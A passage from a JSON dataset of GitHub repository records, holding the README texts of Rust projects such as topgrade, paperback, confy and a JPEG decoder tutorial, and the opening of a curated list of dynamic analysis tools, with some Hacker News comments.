\n Unlike Skia, only `Pattern` is allowed to have opacity.\n In all other cases you should adjust color opacity manually.\n- No bilinear + mipmap down-scaling support.\n- `tiny-skia` uses just a simple alpha mask for clipping, while Skia has a very complicated,\nbut way faster algorithm.\n\n## Notes about the port\n\n`tiny-skia` should be viewed as a Rust 2D rendering library that uses Skia algorithms internally.\nWe have a completely different public API. The internals are also extremely simplified.\nBut all the core logic and math is borrowed from Skia. Hence the name.\n\nAs for the porting process itself, Skia uses goto, inheritance, virtual methods, linked lists,\nconst generics and template specialization a lot, and all of these features are unavailable in Rust.\nThere is also a lot of pointer magic, implicit mutation and caching.\nTherefore we had to compromise or even rewrite some parts from scratch.\n\n## Alternatives\n\nRight now, the only pure Rust alternative is [raqote].\n\n- It doesn't support high-quality antialiasing (hairline stroking in particular).\n- It's very slow (see [benchmarks](./benches/README.md)).\n- There are some rendering issues (like gradient transparency).\n- Raqote has very rudimentary text rendering support, while tiny-skia has none.\n\n## License\n\nThe same as used by [Skia]: [New BSD License](./LICENSE)\n\n[Skia]: https://skia.org/\n[cairo]: https://www.cairographics.org/\n[raqote]: https://github.com/jrmuizel/raqote\n[resvg]: https://github.com/RazrFalcon/resvg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "topgrade-rs/topgrade", "link": "https://github.com/topgrade-rs/topgrade", "tags": ["rust", "cli", "linux", "macos", "package-management", "package-manager", "unix", "windows"], "stars": 672, "description": "Upgrade all the things", "lang": "Rust", "repo_lang": "", "readme": "
# Topgrade\n\n*(logo and badges: GitHub Release, crates.io, AUR, Homebrew; demo GIF)*
\n\n## Introduction\n\n> **Note**\n> This is a fork of [topgrade by r-darwish](https://github.com/r-darwish/topgrade) to keep it maintained.\n\nKeeping your system up to date usually involves invoking multiple package managers.\nThis results in big, non-portable shell one-liners saved in your shell.\nTo remedy this, **Topgrade** detects which tools you use and runs the appropriate commands to update them.\n\n## Installation\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/topgrade.svg)](https://repology.org/project/topgrade/versions)\n\n- Arch Linux: [AUR](https://aur.archlinux.org/packages/topgrade)\n- NixOS: [Nixpkgs](https://search.nixos.org/packages?show=topgrade)\n- Void Linux: [XBPS](https://voidlinux.org/packages/?arch=x86_64&q=topgrade)\n- macOS: [Homebrew](https://formulae.brew.sh/formula/topgrade) or [MacPorts](https://ports.macports.org/port/topgrade/)\n\nUsers of other systems can either use `cargo install` or the compiled binaries from the release page.\nThe compiled binaries contain a self-upgrading feature.\n\nTopgrade requires Rust 1.60 or above.\n\n## Usage\n\nJust run `topgrade`.\n\nVisit the documentation at [topgrade-rs.github.io](https://topgrade-rs.github.io/) for more information.\n\n> **Warning**\n> Work in Progress\n\n## Customization\n\nSee `config.example.toml` for an example configuration file.\n\n### Configuration Path\n\nThe configuration should be placed in the following paths depending on the operating system:\n\n- **Windows** - `%APPDATA%/topgrade.toml`\n- **macOS** and **other Unix systems** - `${XDG_CONFIG_HOME:-~/.config}/topgrade.toml`\n\n## Remote Execution\n\nYou can specify a key called `remote_topgrades` in the configuration file.\nThis key should contain a list of hostnames that have Topgrade installed on them.\nTopgrade will use `ssh` to run `topgrade` on remote hosts before acting locally.\nTo limit the execution only to specific hosts, use the `--remote-host-limit` parameter.\n\n## Contribution\n\n### Problems or missing features?\n\nOpen a new issue describing your problem and, if possible, provide a solution.\n\n### Missing a feature or found an unsupported tool/distro?\n\nJust let us know what you are missing by opening an issue.\nFor tools, please open an issue describing the tool, which platforms it supports and, if possible, give us an example of its usage.\n\n### Want to contribute to the code?\n\nJust fork the repository and start coding.\n\n### Contribution Guidelines\n\n- Check that your code passes `cargo fmt` and `cargo clippy`.\n- Check that your code is self-explanatory; if it isn't, document it with comments.\n\n## Roadmap\n\n- [ ] Add a proper testing framework to the code base.\n- [ ] Add unit tests for package managers.\n- [ ] Split up code into more maintainable parts, e.g. putting every Linux package manager in its own submodule of linux.rs.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cyphar/paperback", "link": "https://github.com/cyphar/paperback", "tags": ["paper", "backup", "shamir-secret-sharing", "secret-sharing", "encryption", "user-friendly"], "stars": 672, "description": "Paper backup generator suitable for long-term storage.", "lang": "Rust", "repo_lang": "", "readme": "## paperback ##\n\n**NOTE**: While paperback is currently fully functional, all of the development\nof \"paperback v0\" is experimental and the format of the various data portions\nof paperback is subject to change without warning. 
This means that a backup\nmade today might not work with paperback tomorrow. However, once there is a\nproper release of paperback, the format of that version of paperback will be\nset in stone and any new changes will be done with a new version of paperback\n(paperback can detect the version of a document, so older documents will always\nbe handled by paperback).\n\n`paperback` is a paper-based backup scheme that is secure and easy to use.\nBackups are encrypted, and the secret key is split into numerous \"key shards\"\nwhich can be stored separately (by different individuals), removing the need\nfor any individual to memorise a secret passphrase.\n\nThis system can also be used as a digital will, because the original creator of\nthe backup is not required to be present (or to consent to) the decryption of the\nbackup if enough of the \"key shards\" are collected. No individual knows the\nsecret key (not even you), and thus no party can be compelled to provide the\nkey without the consent of `k-1` other parties.\n\nTo make this system as simple to use as possible, `paperback` creates several\nPDFs which you can then print out and laminate, ready for recovery. Here are\nsome examples of the generated documents:\n\n| | Mockups | Current Status |\n| ------------- | :---: | :---: |\n| Main Document | *(image)* | *(image)* |\n| Key Shard | *(image)* | *(image)* |\n\nThese \"key shards\" can then be given to a set of semi-trusted people.\n`paperback` also supports `(k, n)` redundancy, allowing for `n` key shards to\nbe created but only `k` being required in order for the backup to be recovered.\n\n\"Semi-trusted\" in this context means that you must be sure of the following two\nstatements about the parties you've given pieces to:\n\n1. At any time, at least `k` of the parties you've given pieces to will provide\n you with the data you gave them. This is important to consider, as human\n relationships can change over time, and your friend today may not be your\n friend tomorrow.\n\n2. At any time, no party will maliciously collude with more than `k-1` other\n parties in order to decrypt your backup information (however, if you are\n incapacitated, you could organise with the parties to cooperate only in that\n instance). Shamir called this having a group of \"mutually suspicious\n individuals with conflicting interests\". Ideally, each of the parties will be\n unaware of each other (or how many parties there are), and would only come\n forward based on pre-arranged agreements with you. In practice, a person's\n social graph is quite interconnected, so a higher level of trust is required.\n\nEach party will get a copy of their unique \"key shard\", and optionally a copy\nof the \"master document\" (though this is not necessary, and in some situations\nyou might want to store it separately so that even if the parties collude they\ncannot use the \"master key\" as they do not have the \"master document\"). We\nrecommend laminating all of the relevant documents, and printing them duplex\n(with each page containing the same page on both sides).\n
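To make the `(k, n)` threshold idea concrete, here is a toy sketch of Shamir secret sharing over the prime field GF(257). This is emphatically not paperback's real construction (see the design document for that), and a real implementation must use cryptographically random coefficients; it only illustrates why any `k` shards recover the secret while fewer do not:

```rust
// Toy (k, n) threshold sharing over GF(257). Illustration only:
// fixed coefficients, tiny field, no crypto-grade randomness.
const P: i64 = 257;

fn mod_pow(mut b: i64, mut e: i64) -> i64 {
    let mut acc = 1;
    b %= P;
    while e > 0 {
        if e & 1 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e >>= 1;
    }
    acc
}

// Modular inverse via Fermat's little theorem (P is prime).
fn inv(a: i64) -> i64 { mod_pow(a, P - 2) }

/// Split `secret` (0..257) into `n` points on a degree `k-1` polynomial.
/// Any `k` points determine the polynomial; `k-1` points reveal nothing.
fn split(secret: i64, k: usize, n: usize) -> Vec<(i64, i64)> {
    // NOTE: derived, non-random coefficients purely for the illustration.
    let coeffs: Vec<i64> = (1..k as i64).map(|i| (secret + 7 * i) % P).collect();
    (1..=n as i64)
        .map(|x| {
            let mut y = secret;
            for (j, c) in coeffs.iter().enumerate() {
                y = (y + c * mod_pow(x, j as i64 + 1)) % P;
            }
            (x, y)
        })
        .collect()
}

/// Lagrange interpolation at x = 0 recovers the secret from any `k` shares.
fn recover(shares: &[(i64, i64)]) -> i64 {
    let mut secret = 0;
    for (i, &(xi, yi)) in shares.iter().enumerate() {
        let mut term = yi;
        for (j, &(xj, _)) in shares.iter().enumerate() {
            if i != j {
                term = term * (P - xj) % P * inv((xi - xj).rem_euclid(P)) % P;
            }
        }
        secret = (secret + term) % P;
    }
    secret
}

fn main() {
    let shares = split(42, 3, 5);           // threshold 3, 5 shards
    assert_eq!(recover(&shares[..3]), 42);  // any 3 shards suffice
    assert_eq!(recover(&shares[2..]), 42);
}
```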
Note that this design can be used in a more \"centralised\" fashion (for instance,\nby giving several lawyers from disparate law firms each an individual key shard,\nwith the intention to protect against attacks against an individual law firm).\nPaperback doesn't have a strong opinion on who would be good key shard holders;\nthat decision is up to you based on your own risk assessment.\n\nA full description of the cryptographic design and threat model is provided [in\nthe included design document][design].\n\n[design]: DESIGN.md\n\n### Usage ###\n\nPaperback is written in [Rust][rust]. In order to build it you need to have a\ncopy of [cargo][cargo]. Paperback can be built like this:\n\n\n```\n% cargo build --release\nwarning: patch for the non root package will be ignored, specify patch at the workspace root:\npackage: /home/cyphar/src/paperback/pkg/paperback-core/Cargo.toml\nworkspace: /home/cyphar/src/paperback/Cargo.toml\n Finished release [optimized] target(s) in 3m 42s\n% ./target/release/paperback ...\n```\n\nThe general usage of paperback is:\n\n * Create a backup using `paperback backup -n THRESHOLD -k SHARDS INPUT_FILE`.\n The `-n` threshold is how many shards are necessary to recover the secret\n (must be at least one), the `-k` shards is the number of shards that will be\n created (must be at least as large as the threshold). The input file is the\n path to a file containing your secret data (or `-` to read from stdin).\n\n The main document will be saved in the current directory with the name\n `main_document-xxxxxxxx.pdf` (`xxxxxxxx` being the document ID), and the key\n shards will be saved in the current directory with names resembling\n `key_shard-xxxxxxxx-hyyyyyyy.pdf` (with `hyyyyyyy` being the shard ID).\n\n * Recover a backup using `paperback recover --interactive OUTPUT_FILE`. You\n will be asked to input the main document data, followed by the shard data and\n codewords. The output file is the path to where the secret data will be\n output (or `-` to write to stdout).\n\n Note that for key shards, the QR code data will be encoded differently to\n the \"text fallback\". This is because it is more space efficient to store the\n data in base10 with QR codes. As long as you copy the entire payload (in\n either encoding), paperback will handle it correctly.\n\n Paperback will tell you how many QR codes from the main document remain to\n be scanned (they can be input in any order), as well as how many remaining\n key shards need to be scanned (along with a list of the key shards already\n scanned).\n\n * Expand a quorum using `paperback expand-shards -n SHARDS --interactive`. The\n `-n` shards number is the number of new shards to be created. You will be\n asked to input enough key shards to form a quorum.\n\n Paperback will tell you how many remaining key shards need to be scanned\n (along with a list of the key shards already scanned).\n\n The new key shards will be saved as PDF files in the same way as with\n `paperback backup`.\n\n * Re-generate key shards with a specific identifier using `paperback\n recreate-shards --interactive SHARD_ID...`. You can specify as many shard\n ids as you like. Shard ids are of the form \"haaaaaaa\" (\"h\" followed by 7\n alphanumeric characters). 
You can specify any arbitrary shard id.\n\n This operation is mostly intended for allowing a shard holder to recover\n their key shard (which may have been lost). Using `recreate-shards` is\n preferable because (assuming you're sure the ID you recreate is the ID of the\n shard you originally gave them) it means that they cannot trick you into\n getting new distinct shards by pretending to lose an old shard. The recreated\n shards are identical in almost every respect to the old shards (except with a\n new set of codewords), so having many copies gives you no more information\n than just one.\n\n Paperback will tell you how many remaining key shards need to be scanned\n (along with a list of the key shards already scanned).\n\n The new key shards will be saved as PDF files in the same way as with\n `paperback backup`.\n\n * Re-print an existing paperback document using `paperback reprint --[type]\n --interactive`. `--[type]` can either be `--main-document` or `--shard` and\n indicates what type of document needs to be reprinted.\n\n You will be asked to enter the data of the document you have specified. The\n new document will be saved as a PDF file in the same way as with `paperback\n backup`.\n\n When reprinting a main document, paperback will tell you how many QR codes\n from the main document remain to be scanned (they can be input in any order).\n\nNote that when inputting data in \"interactive mode\" you have to put an extra\nblank space to indicate that you've finished inputting the data for that QR\ncode. This is to allow you to break the input up over several lines.\n\nCurrently, paperback only supports \"interactive\" input. In the future, paperback\nwill be able to automatically scan the data from each QR code in an image or PDF\nversion of the documents.\n\n[rust]: https://www.rust-lang.org/\n[cargo]: https://doc.rust-lang.org/cargo/\n\n### Paper Choices and Storage ###\n\nOne of the most important things when considering using `paperback` is to keep\nin mind that the integrity of the backup is only as good as the paper you print\nit on. Most \"cheap\" copy paper contains some levels of acid (either from\nprocessing or from the lignin in wood pulp), and thus after a few years will\nbegin to yellow and become brittle.\n\nArchival paper is a grade of paper that is designed to last longer than\nordinary copy paper, and has standardised requirements for acidity levels and\nso on. The [National Archives of Australia][naa-standard] have an even more\nstringent standard for Archival paper and will certify consumer-level archival\npaper if it meets their strict requirements. Though archival paper is quite a\nbit more expensive than copy paper, you can consider it a fairly minor cost (as\nmost users won't need more than 50 sheets). If archival paper is too expensive,\ntry to find alkaline or acid-free paper (you can ask your state or local\nlibrary if they have any recommendations).\n\nIn addition, while using **hot** lamination on a piece of paper may make the\ndocument more resistant to spills and everyday damage, [the lamination process\ncan cause documents to deteriorate faster][anthropology-lamination] due to the\nmaterial most lamination pouches are made from (not to mention that the process\nis fairly hard to reverse). Encapsulation is a process similar to lamination,\nexcept that the laminate is usually made of more inert materials like BoPET\n(Mylar) and only the edges are sealed with tape or thread (allowing the\ndocument to be removed). 
Archival-grade polyester sleeves are more expensive\nthan lamination pouches, though they are not generally prohibitively expensive\n(you can find ~AU$1 sleeves online).\n\nThe required lifetime of a `paperback` backup is entirely up to the user, and so\nmaking the right price-versus-longevity tradeoff is fairly personal. However, if\nyou would like your backups to last indefinitely, I would recommend looking at\nthe [National Archives of Australia's website][naa-preserving-paper] which\ndocuments in quite some detail what common mistakes are made when trying to\npreserve paper documents.\n\nIt is recommended that you explain some of the best practices of storing\nbackups to the people you've given shard backups to -- as they are the people\nwho are in charge of keeping your backups safe and intact.\n\nFor even more recommendations (from archivists) about how best to produce and\nstore paper documents, the Canadian Conservation Institute [has publicly\nprovided very detailed explanations of their best practice\nrecommendations][cci-notes]. Unfortunately, there aren't as many details given\nabout what a *producer* of a document should do.\n\n[naa-standard]: https://web.archive.org/web/20180304061138/https://www.naa.gov.au/information-management/managing-information-and-records/preserving/physical-records-pres/archival-quality-paper-products.aspx\n[anthropology-lamination]: https://web.archive.org/web/20181128202230/http://anthropology.si.edu/conservation/lamination/lamination_guidelines.htm\n[naa-preserving-paper]: https://web.archive.org/web/20180324131805/http://www.naa.gov.au/information-management/managing-information-and-records/preserving/artworks.aspx\n[cci-notes]: https://www.canada.ca/en/conservation-institute/services/conservation-preservation-publications/canadian-conservation-institute-notes.html\n\n### License ###\n\n`paperback` is licensed under the terms of the GNU GPLv3+.\n\n```\npaperback: resilient paper backups for the very paranoid\nCopyright (C) 2018-2022 Aleksa Sarai \n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see https://www.gnu.org/licenses/.\n```\n", "readme_type": "markdown", "hn_comments": "It would be really cool if a small decoding binary could be printed on the back as a massive QR code. Then the paper would be all you'd need to recover the original document.\n\nSurely there's a better medium for long-term storage than paper? I can see this working for small documents, but if you have to print out thousands of pages you might as well store the data on some kind of USB and maybe just print out the key shards.\n\nIt's a thousand pages, give or take a few.\nI'll be writing more in a week or two.\nI could make it longer if you like the style.\nI can change it 'round,\nAnd I want to be a paperback writer,\nPaperback writer\n\nSome documentation about how to go about decoding and inputting a document should be done.... 
I still haven't figured out how to do this after spending some time, first trying to get it to build (it didn't build on debian stable; I needed a debian testing chroot). Now I can get the base64-strings from the qr-codes, but it's not clear how to pass these to paperback to decode the main document.\n\nSeems like a nice physical backup for a password manager export.\n\nThe image of an example document says something like \u201cTo recover the content, download the latest version of paperback from \u201c. I have a few questions about that.\n1. Would that link even work after 10 or 20 or 30 years? What\u2019s the fallback if the link is broken?\n2. Is the \u201clatest version\u201d always guaranteed to be compatible with the scheme used by the document in question (again, consider that the document is created now but is being attempted to be recovered a few decades from now)?\n3. Based on the above questions, what\u2019s a reasonable expected age for this system to work (I\u2019m referring to the software)?\nIt would be useful to have these questions and their answers added in an FAQ on the site and in the repo.\n\nThe problem is that QR codes are not information dense enough to encode large amounts of data efficiently. I have been trying to build something similar to this using various encoding methods. So far, I have trouble getting more than about 64k on a printed page such that it can be optically recognized. The number of symbols in your encoding alphabet is important, and this reduces recognition. I like this project and it gives me some ideas on how to enhance my solution.\nThank you!\n\nOne use case is that you can share a different number of key shards with different individuals. Thus, they have more \"power\" based on how much you trust them. If this is your will, you can give 3 shards to your sister (whom you trust absolutely) and require 4 shards to decrypt it. 
Your \"semi-trusted\" friends needs to be 4 to decrypt it, but your sister only needs to know one of your friend to access.Written in rust for extra HN creds /s", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-cli/confy", "link": "https://github.com/rust-cli/confy", "tags": ["configuration", "cli"], "stars": 670, "description": "\ud83d\udecb Zero-boilerplate configuration management in Rust ", "lang": "Rust", "repo_lang": "", "readme": "# confy\n\n[![crates.io](https://img.shields.io/crates/v/confy)](https://crates.io/crates/confy)\n[![docs.rs](https://img.shields.io/docsrs/confy)](https://docs.rs/confy/)\n[![Discord](https://img.shields.io/badge/chat-Discord-informational)](https://discord.gg/dwq4Zme)\n\nZero-boilerplate configuration management.\n\nFocus on storing the right data, instead of worrying about how or where to store it.\n\n```rust\nuse serde_derive::{Serialize, Deserialize};\n\n#[derive(Default, Debug, Serialize, Deserialize)]\nstruct MyConfig {\n version: u8,\n api_key: String,\n}\n\nfn main() -> Result<(), ::std::io::Error> {\n let cfg: MyConfig = confy::load(\"my-app-name\", None)?;\n dbg!(cfg);\n Ok(())\n}\n```\n\n## Confy's feature flags\nConfy can be used with either `TOML`, `YAML`, or `RON` files.\n`TOML` is the default language used with confy but any of the other languages can be used by enabling them with feature flags as shown below.\n\nNote: you can only use __one__ of these features at a time, so in order to use either of the optional features you have to disable default features.\n\n### Using yaml\nTo use YAML files with confy you have to make sure you have enabled the `yaml_conf` feature and disabled both `toml_conf` and `ron_conf`.\n\nEnable the feature in `Cargo.toml`:\n```toml\n[dependencies.confy]\nfeatures = [\"yaml_conf\"]\ndefault-features = false\n```\n\n### Using ron\nFor using RON files with confy you have to make sure you have enabled the `ron_conf` feature and disabled both `toml_conf` and `yaml_conf`.\n\nEnable the feature in `Cargo.toml`:\n```toml\n[dependencies.confy]\nfeatures = [\"ron_conf\"]\ndefault-features = false\n```\n\n## Changing error messages\nInformation about adding context to error messages can be found at [Providing Context](https://rust-cli.github.io/book/tutorial/errors.html#providing-context)\n\n## Breaking changes\n### Version 0.5.0\n* The base functions `load` and `store` have been added an optional parameter in the event multiples configurations are needed, or ones with different filename.\n* The default configuration file is now named \"default-config\" instead of using the application's name. Put the second argument of `load` and `store` to be the same of the first one to keep the previous configuration file.\n* It is now possible to save the configuration as toml or as yaml. The configuration's file name's extension depends on the format used.\n\n### Version 0.4.0\nStarting with version 0.4.0 the configuration file are stored in the expected place for your system. 
### Version 0.4.0\nStarting with version 0.4.0, the configuration file is stored in the expected place for your system. See the [`directories`] crate for more information.\nBefore version 0.4.0, the configuration file was written in the current directory.\n\n[`directories`]: https://crates.io/crates/directories\n[`directories-next`]: https://crates.io/crates/directories-next\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MROS/jpeg_tutorial", "link": "https://github.com/MROS/jpeg_tutorial", "tags": ["jpeg", "decoder", "rust"], "stars": 667, "description": "\u8ddf\u6211\u5beb JPEG \u89e3\u78bc\u5668 (Write a JPEG decoder with me)", "lang": "Rust", "repo_lang": "", "readme": "# Follow me to write a JPEG decoder\n\n## Origin\n\nI wrote a [JPEG decoder](https://github.com/MROS/jpeg_decoder) in C++ a few years ago. I still remember that the introductions to the JPEG format available online at the time were messy and incomplete, while the standard, though complete and rigorous, was a long and tedious read. Was there really no way to get the job done quickly? Eventually I found a decoder written in Python on GitHub, and by tracing through its code I managed to understand the parts the online articles had left unclear.\n\nWhile writing this article I searched the web again and found that several good articles have indeed appeared in the past few years. Digging deeper, though, the Chinese articles explaining JPEG all derive from the same source, [JPEG image decoding scheme](http://read.pudn.com/downloads166/ebook/757412/jpeg/JPEG%CD%BC%CF%F1%BD%E2%C2%EB%B7%BD%B0%B8.pdf), whose theoretical depth and clarity of discussion are somewhat lacking, so I decided to take up the challenge and see whether I could explain JPEG more clearly in my own way. Some of my predecessors' examples are very good, however, and I will keep using them with attribution.\n\nThe purpose of this article is that **readers should be able to build their own JPEG decoder as quickly as possible simply by following its steps**. In addition, while re-implementing the JPEG decoder for this article, I will write some small tools that can assist with debugging, and open-source them for readers to use. The decoder's source code will also be kept as readable as possible, so readers can consult it directly.\n\nIf time allows, I will also try to write about the theoretical basis of JPEG. After all, being able to implement an algorithm does not mean one understands its principles. Theoretical articles are still scarce, however. 
I would like to be a pioneer here, even if tens of thousands stand in the way.\n\n## Chapter description\n\nFor ease of reading, and to give readers a sense of progress, I have divided the entire decoding process into five chapters, with appendices explaining the theoretical basis and optimization techniques of JPEG.\n\n- [(1) Overview](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%B8%80%EF%BC%89%E6%A6%82%E8%BF%B0.md): an introduction to the JPEG decoding process\n- [(2) File structure](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%BA%8C%EF%BC%89%E6%AA%94%E6%A1%88%E7%B5%90%E6%A7%8B.md): an introduction to the JPEG file structure\n- [(3) Read the quantization tables and Huffman tables](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%B8%89%EF%BC%89%E8%AE%80%E5%8F%96%E9%87%8F%E5%8C%96%E8%A1%A8%E3%80%81%E9%9C%8D%E5%A4%AB%E6%9B%BC%E8%A1%A8.md)\n- [(4) Read the compressed image data](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E5%9B%9B%EF%BC%89%E8%AE%80%E5%8F%96%E5%A3%93%E7%B8%AE%E5%9C%96%E5%83%8F%E6%95%B8%E6%93%9A.md)\n- [(5) Decoding](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%BA%94%EF%BC%89%E8%A7%A3%E7%A2%BC.md)\n- (Appendix 1) Theoretical basis\n- [(Appendix 2) Optimization techniques](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E9%99%84%E9%8C%84%E4%BA%8C%EF%BC%89%E5%84%AA%E5%8C%96%E6%8A%80%E5%B7%A7.md)\n- [(Appendix 3) References](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E9%99%84%E9%8C%84%E4%B8%89%EF%BC%89%E5%8F%83%E8%80%83%E8%B3%87%E6%96%99.md)\n
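As a taste of what those chapters walk through, here is a toy sketch (in Rust, like the supporting code, but not taken from this repository) of one small step of the pipeline: undoing the zig-zag ordering and the quantization of a single 8x8 coefficient block. The helper names are hypothetical:

```rust
/// Standard JPEG zig-zag scan order for an 8x8 block: maps the i-th
/// entropy-decoded coefficient to its row-major position in the block.
const ZIGZAG: [usize; 64] = [
     0,  1,  8, 16,  9,  2,  3, 10,
    17, 24, 32, 25, 18, 11,  4,  5,
    12, 19, 26, 33, 40, 48, 41, 34,
    27, 20, 13,  6,  7, 14, 21, 28,
    35, 42, 49, 56, 57, 50, 43, 36,
    29, 22, 15, 23, 30, 37, 44, 51,
    58, 59, 52, 45, 38, 31, 39, 46,
    53, 60, 61, 54, 47, 55, 62, 63,
];

/// Hypothetical helper: the entropy decoder yields 64 coefficients in
/// zig-zag order; each is multiplied by its quantization-table entry and
/// placed back at its natural position, ready for the inverse DCT.
fn dequantize(coeffs: &[i32; 64], qtable: &[u16; 64]) -> [i32; 64] {
    let mut block = [0i32; 64];
    for i in 0..64 {
        block[ZIGZAG[i]] = coeffs[i] * qtable[i] as i32;
    }
    block
}
```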
## Reading the math\n\nGitHub does not support writing mathematical formulas in Markdown. It is recommended to clone this project and read it with [typora](https://typora.io/) (enable inline math formulas in typora's preferences) or other Markdown reading software, which gives a better experience.\n\n## [Supporting code](https://github.com/MROS/jpeg_tutorial)\n\n### Preparation\n\n- The supporting code is written in Rust; please install the [Rust toolchain](https://www.rust-lang.org/tools/install) first.\n\n### Download the code\n```sh\ngit clone https://github.com/MROS/jpeg_tutorial\n```\n\n### Install\n\n```sh\ncd jpeg_tutorial\ncargo install --path .\n```\n`cargo install` will put the compiled executable `jpeg_tutorial` into ~/.cargo/bin; please make sure ~/.cargo/bin is already in $PATH.\n\n### Run\n\n#### Convert to ppm format\n\nThe default file name of the output ppm file is out.ppm.\n\n```sh\njpeg_tutorial <jpeg-file> ppm\n```\n\nWithout a subcommand, the default behaviour is also to convert to ppm:\n\n```sh\njpeg_tutorial <jpeg-file>\n```\n\n#### Print the data of each section\n\n```\njpeg_tutorial <jpeg-file> reader\n```\n\n#### Print only the marker codes\n\n```\njpeg_tutorial <jpeg-file> marker\n```\n\n#### Print the state of the specified MCU at each stage of the decoding process\n\n```\njpeg_tutorial <jpeg-file> mcu <row> <column>\n```\n\nSuppose there is a picture 8 MCUs high and 12 MCUs wide; use\n\n```sh\njpeg_tutorial <jpeg-file> mcu 7 11\n```\n\nto get the per-stage state of the MCU in the bottom-right corner. Note that indices start from 0.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "analysis-tools-dev/dynamic-analysis", "link": "https://github.com/analysis-tools-dev/dynamic-analysis", "tags": ["dynamic", "analysis", "dynamic-code-analysis", "dynamic-analysis", "dast"], "stars": 667, "description": "\u2699\ufe0f A curated list of dynamic analysis tools and linters for all programming languages, binaries, and more.", "lang": "Rust", "repo_lang": "", "readme": "*(Analysis Tools logo)*\n\nThis repository lists **dynamic analysis tools** for all programming languages, build tools, config files and more. The focus is on tools which improve code quality, such as linters and formatters.\nThe official website, [analysis-tools.dev](https://analysis-tools.dev/), is based on this repository and adds rankings, user comments, and additional resources like videos for each tool.\n\n[![Website](https://img.shields.io/badge/Website-Online-2B5BAE)](https://analysis-tools.dev)\n![CI](https://github.com/analysis-tools-dev/dynamic-analysis/workflows/CI/badge.svg)\n\n## Sponsors\n\nThis project would not be possible without the generous support of our sponsors.\n\n*(sponsor logos)*
\n\nIf you also want to support this project, head over to our [Github sponsors page](https://github.com/sponsors/analysis-tools-dev).\n\n## Meaning of Symbols:\n\n- :copyright: stands for proprietary software. All other tools are Open Source.\n- :information_source: indicates that the community does not recommend using this tool for new projects anymore. The icon links to the discussion issue.\n- :warning: means that this tool was not updated for more than 1 year, or the repo was archived.\n\nPull requests are very welcome! \nAlso check out the sister project, [awesome-static-analysis](https://github.com/mre/awesome-static-analysis).\n\n## Table of Contents\n\n#### [Programming Languages](#programming-languages-1)\n\n
\n\n#### [Multiple languages](#multiple-languages-1)\n\n#### [Other](#other-1)\n\n- [API](#api)\n- [Binaries](#binary)\n- [Bytecode/IR](#bytecode)\n- [Cloud](#cloud)\n- [Containers](#container)\n- [Laravel](#laravel)\n- [Security/DAST](#security)\n- [Web](#web)\n- [WebAssembly](#webassembly)\n- [XML](#xml)\n\n---\n\n## Programming Languages\n\n
### .NET
\n\n\n- [Microsoft IntelliTest](https://docs.microsoft.com/en-us/visualstudio/test/intellitest-manual/getting-started?view=vs-2019) \u2014 Generate a candidate suite of tests for your .NET code.\n\n- [Pex and Moles](https://www.microsoft.com/en-us/research/project/pex-and-moles-isolation-and-white-box-unit-testing-for-net/) \u2014 Pex automatically generates test suites with high code coverage using automated white box analysis.\n\n\n
### C
\n\n\n- [CHAP](https://github.com/vmware/chap) \u2014 Analyzes un-instrumented ELF core files for leaks, memory growth, and corruption. It helps explain memory growth, can identify some forms of corruption, and supplements a debugger by giving the status of various memory locations.\n\n- [KLEE](https://github.com/klee/klee) \u2014 Symbolic virtual machine built on top of the LLVM compiler infrastructure.\n\n- [LDRA](https://ldra.com) :copyright: \u2014 A tool suite including dynamic analysis and test to various standards can ensure test coverage to 100% op-code, branch & decsion coverage.\n\n- [LLVM/Clang Sanitizers](https://github.com/google/sanitizers) \u2014 \n\n- [tis-interpreter](https://github.com/TrustInSoft/tis-interpreter) \u2014 An interpreter for finding subtle bugs in programs written in standard C.\n\n- [Valgrind](https://valgrind.org/) \u2014 An instrumentation framework for building dynamic analysis tools.\n\n\n
### C++
